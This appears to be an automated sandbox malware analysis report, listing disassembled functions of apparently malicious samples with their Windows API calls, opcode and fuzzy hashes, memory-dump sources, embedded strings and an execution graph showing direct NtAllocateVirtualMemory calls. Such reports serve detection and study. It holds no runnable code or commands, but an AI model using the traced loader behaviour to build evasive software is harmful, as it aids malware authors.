                                                                                                                                  • Opcode Fuzzy Hash: 90d04e02974a06f65b784dbc63e144878ab6ecb7c3416654c4618193e91c995a
                                                                                                                                  • Instruction Fuzzy Hash: B4619C34B14248DFEB11DFA8C488B9DBBF5EF49304F5480A6E840A7292D770BE44DB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b143455e39f806a9025ce291fdeea086a532cf66a6a6547d4a574ee86863053c
                                                                                                                                  • Instruction ID: a4da95a1878bf3a67ff12df39a9eaea3a7393aa1b8012397fb533722ea21f9b9
                                                                                                                                  • Opcode Fuzzy Hash: b143455e39f806a9025ce291fdeea086a532cf66a6a6547d4a574ee86863053c
                                                                                                                                  • Instruction Fuzzy Hash: 84A1E66A710E005BE719AA7EACD43BDB3D19BC5725F1846BEE115CB280EB78E9458380
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,041EA6DA), ref: 041EA672
                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,041EA6DA), ref: 041EA678
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                  • String ID: yyyy
                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                  • Opcode ID: 72fbf48b3c94200fac994c849eca847de6b7f358f7220b154bfe269b39bc039a
                                                                                                                                  • Instruction ID: b25838919c6cf0c2df81f1b30eb2a52d555fff1fafbec0281bb7ca9e30eac4a8
                                                                                                                                  • Opcode Fuzzy Hash: 72fbf48b3c94200fac994c849eca847de6b7f358f7220b154bfe269b39bc039a
                                                                                                                                  • Instruction Fuzzy Hash: F4215E79A00A189BEB14DF96C9C1ABEB3B8EF0D740F4144A5E905E7250D734AE40DBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$EqualIntersect
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 3291753422-2766056989
                                                                                                                                  • Opcode ID: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                                                  • Instruction ID: 1fcb8f0daae142121084dbe9c311943c3807d65e0e5b39af31dd8d5296d2b735
                                                                                                                                  • Opcode Fuzzy Hash: cbc18d0ac1d896cb12466ba29234260cad3ac865e903ab36d0426d2633c7346d
                                                                                                                                  • Instruction Fuzzy Hash: 3411E331A152486BD710DBACCC84BEEBBE8AF49218F040291EC04DB391C731ED45CBD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420AF86
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420AF98
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                                                                  • String ID: MonitorFromPoint
                                                                                                                                  • API String ID: 1792783759-1072306578
                                                                                                                                  • Opcode ID: 7eddccff3e4a513ea7ea3f80bcbd362ff48a4db708379a56f008e5c68b022ae3
                                                                                                                                  • Instruction ID: f8fadc1a41a4f357fa46eb66b973c675a5c53c06d83c728126b63a5e42c502b8
                                                                                                                                  • Opcode Fuzzy Hash: 7eddccff3e4a513ea7ea3f80bcbd362ff48a4db708379a56f008e5c68b022ae3
                                                                                                                                  • Instruction Fuzzy Hash: 8D018BB1714315AFDB004E58E84C7DD77A5EBB47E5F808014F9159B1D2D3F6AC458790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420AE61
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420AE6D
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                                                                  • String ID: MonitorFromRect
                                                                                                                                  • API String ID: 1792783759-4033241945
                                                                                                                                  • Opcode ID: 0003e6fe37c2e7371aebf806a0a0834d210a427f780860afc48f28b1a55379b2
                                                                                                                                  • Instruction ID: bc7d41e625c03abcbe1546d4ce2b8b05ab74963bff335593d45a6f419c5b31dc
                                                                                                                                  • Opcode Fuzzy Hash: 0003e6fe37c2e7371aebf806a0a0834d210a427f780860afc48f28b1a55379b2
                                                                                                                                  • Instruction Fuzzy Hash: F4016731710315ABEB108E18E988B5DB795DB547A5F84C461DA05DB182C378EC40CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(?), ref: 0420ADEA
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  • GetSystemMetrics.USER32(?), ref: 0420ADB0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$AddressProc
                                                                                                                                  • String ID: GetSystemMetrics
                                                                                                                                  • API String ID: 1792783759-96882338
                                                                                                                                  • Opcode ID: 9b52733f1a605c9131735122bf17134605ebe02811f80df6e43c956e1129d316
                                                                                                                                  • Instruction ID: 4a119d903b0e9e94850caaadaad432d8ef0d5bf5622630a1a393f7254c270d79
                                                                                                                                  • Opcode Fuzzy Hash: 9b52733f1a605c9131735122bf17134605ebe02811f80df6e43c956e1129d316
                                                                                                                                  • Instruction Fuzzy Hash: F3F090707343015FDB14EA3CE98823A35E9EBA6276FC0CA61A212C61C7E2FDB841D210
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 04213203
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 04213214
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1649606143-3916222277
                                                                                                                                  • Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                  • Instruction ID: c1913f7f4cb1c811e9a35c58d0f7efdb39c1919c5eb47220ed4c929013de8d2d
                                                                                                                                  • Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                                                  • Instruction Fuzzy Hash: 00E0D866700B4222F613B9A93C407E757D24F637B8F0806AAFED41A1E1EA862D1691A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 04238C5C
                                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 04238C8C
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 04238CAB
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 04238CB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Read$Write
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3448952669-0
                                                                                                                                  • Opcode ID: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                                                  • Instruction ID: 73589a03c2cd4004f43b486810a30cd46112535185c506e8962ed80273087adf
                                                                                                                                  • Opcode Fuzzy Hash: f0b00c3df094b11b5a48fba442859b1c5b70d8bc394c6ba809d978a3f1d86900
                                                                                                                                  • Instruction Fuzzy Hash: 6D21CDB070161A9BDF14EE29CC80BAE73B8EF80B22F404951FE10AB344D734F81186A4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  • CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc, xrefs: 00430A4D
                                                                                                                                  • %, xrefs: 00430A71
                                                                                                                                  • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t, xrefs: 00430A68
                                                                                                                                  • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha, xrefs: 00430A32
                                                                                                                                  • bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit, xrefs: 00430A17
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000001.1488647701.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000001.1488647701.000000000088B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000001.1488647701.000000000088F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000001.1488647701.00000000008AB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000001.1488647701.00000000008B5000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_1_400000_veaiqniF.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %$CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha$bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t
                                                                                                                                  • API String ID: 0-1005992549
                                                                                                                                  • Opcode ID: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
                                                                                                                                  • Instruction ID: d6b05460dce053fcb725ba51d2c67ca3e53d8b493b6d73661264cc7acd7f9677
                                                                                                                                  • Opcode Fuzzy Hash: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
                                                                                                                                  • Instruction Fuzzy Hash: 4D51F4B45087018FD300EF25D194B5ABBF0BF8A718F009A6EE8988B392D739D945CF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:6.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:66
                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                  execution_graph 39463 415f2a8 39464 415f2ca 39463->39464 39466 415f4d4 39464->39466 39467 414fe44 VariantClear VariantCopy 39464->39467 39467->39464 39468 41a8704 39471 419ca40 39468->39471 39470 41a870c 39472 419ca48 39471->39472 39473 419cb28 39472->39473 39474 419cb32 39473->39474 39482 419d863 39474->39482 39475 419dade 39480 419dafd 39475->39480 39476 419e039 39477 419e10d 39476->39477 39487 419dbde 39477->39487 39478 41a632a 39531 414f760 VariantClear 39478->39531 39480->39482 39485 414f768 VariantClear VariantCopy 39480->39485 39480->39487 39497 4153c7c 39480->39497 39501 4152b54 39480->39501 39481 41a792b 39481->39470 39482->39475 39483 419fe83 39483->39487 39489 41a0a23 39483->39489 39485->39480 39487->39476 39487->39478 39487->39483 39488 41a22c9 39487->39488 39490 41a4d43 39487->39490 39492 41a4420 39487->39492 39488->39470 39489->39470 39496 41a5353 39490->39496 39530 419ae00 NtAllocateVirtualMemory 39490->39530 39529 4198e4c NtAllocateVirtualMemory 39492->39529 39495 41a4c2c 39495->39470 39496->39478 39521 4167e4c 39496->39521 39498 4153c90 39497->39498 39499 4153c89 39497->39499 39498->39480 39532 414f6d0 39499->39532 39502 4152b5c 39501->39502 39502->39502 39503 4152dbd 39502->39503 39504 4152d93 39502->39504 39505 4152da4 39502->39505 39520 4152be2 39502->39520 39508 4152ddc 39503->39508 39509 4152dcb 39503->39509 39503->39520 39506 4152b54 2 API calls 39504->39506 39536 415299c VariantClear 39505->39536 39506->39520 39537 4152a68 VariantClear VariantCopy 39508->39537 39511 4152dfe 39509->39511 39512 4153009 39509->39512 39513 4152ff3 39511->39513 39514 4152fe5 39511->39514 39511->39520 39539 4152acc VariantClear 39512->39539 39538 415299c VariantClear 39513->39538 39517 4152b54 2 API calls 39514->39517 39517->39520 39518 4153019 39518->39520 39540 415299c VariantClear 39518->39540 39520->39480 39524 4167e54 39521->39524 39522 4168b44 39523 415fb80 NtAllocateVirtualMemory 39522->39523 39528 4168cbf 39523->39528 39524->39522 39526 41689d0 39524->39526 39524->39528 39541 415fb80 39524->39541 39527 415fb80 NtAllocateVirtualMemory 39526->39527 39527->39522 39528->39478 39529->39495 39530->39496 39531->39481 39533 414f6de 39532->39533 39535 414f6eb 39532->39535 39534 414f6e4 VariantClear 39533->39534 39534->39535 39535->39498 39536->39520 39537->39520 39538->39520 39539->39518 39540->39520 39542 415fb92 39541->39542 39543 415fb98 NtAllocateVirtualMemory 39542->39543 39543->39526

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0415FBB3
                                                                                                                                  Strings
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 0415FB88
                                                                                                                                  • NtAllocateVirtualMemory, xrefs: 0415FB83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                  • API String ID: 2167126740-2206134580
                                                                                                                                  • Opcode ID: faffa0968585e1ff1ea76a14b6e92873663f1d3d737bcbed4a26c3ff22c8445d
                                                                                                                                  • Instruction ID: f5eadc28b6132fa9abd6ac6f51650461e5a55a6f2add373bfc05d8ecbe269889
                                                                                                                                  • Opcode Fuzzy Hash: faffa0968585e1ff1ea76a14b6e92873663f1d3d737bcbed4a26c3ff22c8445d
                                                                                                                                  • Instruction Fuzzy Hash: 0AE0EEB2201208BBCB00EE98D981ECB37ECAB09644B004012BA18C7200C738E9108BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5192 414facc-414fad9 5193 414fae2-414fae9 5192->5193 5194 414fadb-414fadd call 414f6d0 5192->5194 5196 414faf9-414fafe 5193->5196 5197 414faeb-414faed call 414e15c 5193->5197 5194->5193 5199 414fb17-414fb1c 5196->5199 5200 414fb00-414fb15 call 41447dc 5196->5200 5201 414faf2-414faf7 VariantCopy 5197->5201 5203 414fb31-414fb36 5199->5203 5204 414fb1e-414fb2f 5199->5204 5207 414fb72-414fb76 5200->5207 5201->5207 5205 414fb48-414fb53 call 4154288 5203->5205 5206 414fb38-414fb46 call 414f8f8 5203->5206 5204->5207 5214 414fb55-414fb64 5205->5214 5215 414fb66-414fb6d call 414e15c call 414f39c 5205->5215 5206->5207 5214->5207 5215->5207
                                                                                                                                  APIs
                                                                                                                                  • VariantCopy.OLEAUT32 ref: 0414FAF2
                                                                                                                                    • Part of subcall function 0414F6D0: VariantClear.OLEAUT32 ref: 0414F6E4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                  • Opcode ID: b715666f21f15755dc116b4a8f1ceeb841bac2797fd231b1975db8e0e53b9110
                                                                                                                                  • Instruction ID: 34e9c39b62bf7c0532531dfb47ebc4c8c1b7e0766dbda2c1bdf59bbc06b4f8ff
                                                                                                                                  • Opcode Fuzzy Hash: b715666f21f15755dc116b4a8f1ceeb841bac2797fd231b1975db8e0e53b9110
                                                                                                                                  • Instruction Fuzzy Hash: C411A5607003108BEB24AF29C9D096777E9EFC67947198466E88A8F355DB30FC43D765
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5220 414f6d0-414f6dc 5221 414f6de-414f6df call 414e154 5220->5221 5222 414f6eb-414f6f0 5220->5222 5226 414f6e4-414f6e9 VariantClear 5221->5226 5224 414f701-414f706 5222->5224 5225 414f6f2-414f6ff call 4144788 5222->5225 5228 414f712-414f717 5224->5228 5229 414f708-414f710 5224->5229 5232 414f747-414f74a 5225->5232 5226->5232 5230 414f722-414f72d call 4154288 5228->5230 5231 414f719-414f720 call 414f554 5228->5231 5229->5232 5239 414f72f-414f739 5230->5239 5240 414f73b-414f742 call 414e154 call 414e14c 5230->5240 5231->5232 5239->5232 5240->5232
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 57071ad55ef89ba190d3c360e642005961a29ddd6d4d9db78aed7eebf15da778
                                                                                                                                  • Instruction ID: 7927a8b8bd330af4e869822e039215bc881c2444d2ea4f896b3c4f651ceaa7ea
                                                                                                                                  • Opcode Fuzzy Hash: 57071ad55ef89ba190d3c360e642005961a29ddd6d4d9db78aed7eebf15da778
                                                                                                                                  • Instruction Fuzzy Hash: 71F0F6B83002108AB7157F389DC49AA239DAFC064AB5154B5E4479B311DB3DFC4BD322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMonitorInfoA.USER32(?,?), ref: 0416B001
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416B03D
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416B048
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$InfoMonitor
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                  • API String ID: 4250584380-1633989206
                                                                                                                                  • Opcode ID: bd1f52827f8d37f4ce5a56131002de208f02e578be1cdfd8a6e9e196e6d782e2
                                                                                                                                  • Instruction ID: f29501f1897ea40c21b5e2393293366adb60ae7e67c3a5fae4042fe19823a4a0
                                                                                                                                  • Opcode Fuzzy Hash: bd1f52827f8d37f4ce5a56131002de208f02e578be1cdfd8a6e9e196e6d782e2
                                                                                                                                  • Instruction Fuzzy Hash: 1011DC71606320AFE720CF6598847B7BBF8EF05350F004629E966D7240D7B8F8948BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0416B285
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416B2AA
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416B2B5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem$DisplayEnumMonitors
                                                                                                                                  • String ID: EnumDisplayMonitors
                                                                                                                                  • API String ID: 1389147845-2491903729
                                                                                                                                  • Opcode ID: 112756d956d6b6260bb60f01e4d15e454a2b73caa87b72c7419ece96771728da
                                                                                                                                  • Instruction ID: e27c4ddf7d9e4e98930f938f00339537632322488c3b4047ea93be720f1b03b4
                                                                                                                                  • Opcode Fuzzy Hash: 112756d956d6b6260bb60f01e4d15e454a2b73caa87b72c7419ece96771728da
                                                                                                                                  • Instruction Fuzzy Hash: 90313EB2A05219AFDB10DEA9C9C49FF77BCEF45200F044166E916E3240E738F924CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416B111
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416B11C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                  • API String ID: 4116985748-1370492664
                                                                                                                                  • Opcode ID: bade87dd959a5827cfd735d77c6781ca7ec7ecc9144cd79350548bae1cd6a635
                                                                                                                                  • Instruction ID: 7fafc0fe6759e908c6b69441b5911093db7b0d1d27d0ffbaaaf1367bd6418ba8
                                                                                                                                  • Opcode Fuzzy Hash: bade87dd959a5827cfd735d77c6781ca7ec7ecc9144cd79350548bae1cd6a635
